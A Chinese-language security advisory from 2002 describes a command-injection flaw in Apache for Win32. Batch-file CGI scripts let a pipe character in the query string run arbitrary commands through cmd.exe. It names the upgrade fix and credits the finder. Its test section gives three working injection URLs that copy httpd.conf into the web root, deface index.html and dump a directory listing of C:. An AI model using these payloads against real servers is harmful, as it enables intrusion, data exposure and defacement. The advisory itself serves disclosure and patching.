Apache for win32存在任意命令可执行漏洞发布时间:2002-03-22 更新时间:2002-03-22 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Apache web server (Win32)详细描述 Apache 2.0.x默认安装下安装了/cgi-bin/test-cgi.bat批出来文件,当DOS 批处理文件(.bat或者.cmd)请求提交给APACHE WEB服务器的时候,服务器会派生一个SHELL解释程序(默认是cmd.exe),然后运行由用户发送过来的带参数脚本,远程攻击者可以发送管道字符"|"并追加命令作为传输传递给CGI脚本,可导致SHELL解释程序执行后缀命令,导致以HTTPD一般是SYSTEM权利执行任意命令。 注意不光是默认/cgi-bin/test-cgi.bat批处理文件,其他批处理文件也可以执行任意命令。 测试代码 http://TARGET/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf http://TARGET/cgi-bin/test-cgi.bat?|echo+Foobar+>>+..\htdocs\index.html http://TARGET/cgi-bin/test-cgi.bat?|dir+c:+>..\htdocs\dir.txt 解决方案 升级apache WEB服务器到1.3.24或者2.0.34-beta版本: http://www.apache.org/dist/httpd/ 相关信息 Ory Segal (ORY.SEGAL@SANCTUMINC.COM) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-03/att-0270/01-apache_advisory.txt http://www.sanctuminc.com/ 相关主页:http://www.apache.org/ |
